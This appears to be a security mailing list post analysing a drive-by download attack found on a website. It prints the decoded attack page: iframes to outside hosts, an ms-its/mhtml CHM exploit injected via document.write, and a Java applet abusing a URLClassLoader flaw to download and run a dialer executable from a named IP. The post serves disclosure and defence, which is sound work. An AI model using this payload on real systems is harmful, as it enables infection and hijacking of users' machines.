<<< Date Index >>>     <<< Thread Index >>>

Strange Java Loader



Hi People,

before reading this,
dont go on any of the sites
unless you are sure ;)

after decrypting some stuff, this is the source from:
http://xxl-size.com/cogo.html
-------------------------------------
<iframe src="http://209.8.20.130/dl/adv346.php";>
<iframe src="http://www.awmcash.biz/adverts/14/1.htm";>
-------------------------------------

this is the source from one of the iframes
(http://209.8.20.130/dl/adv346.php):
----------------------------------------------------
<html><head>
</head><body>
<textarea id="cxw" style="display:none;">
    <object data="${PR}" type="text/x-scriptlet"></object>
</textarea>

<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'&#109;s-its:mhtml:file://c:\\nosuch.mht!http://209.8.20.130/dl/adv346/x.chm::/x.htm'));
</script>
<applet width=1 height=1 ARCHIVE=loaderadv346.jar 
code=Counter></APPLET></body></html>
----------------------------------------------------

the jar archive loaderadv346.jar contains some java classes
which exploits the URLClassLoader bug (BlackBox.class).
it overrides the sandbox and downloads a loadadv346.exe from:
http://209.8.20.130/dl/loadadv346.exe

this seems to be a dialer or something like this,
it changes the hosts file, creates some spawn files,
you can look for yourself, i included the file
and the java stuff, the loadadv is upx'd,

so far, anyone knows how to protect from this crap?
you're welcome to send some solutions ;)

cya, Stefan

Attachment: loaderadv.zip
Description: Zip compressed data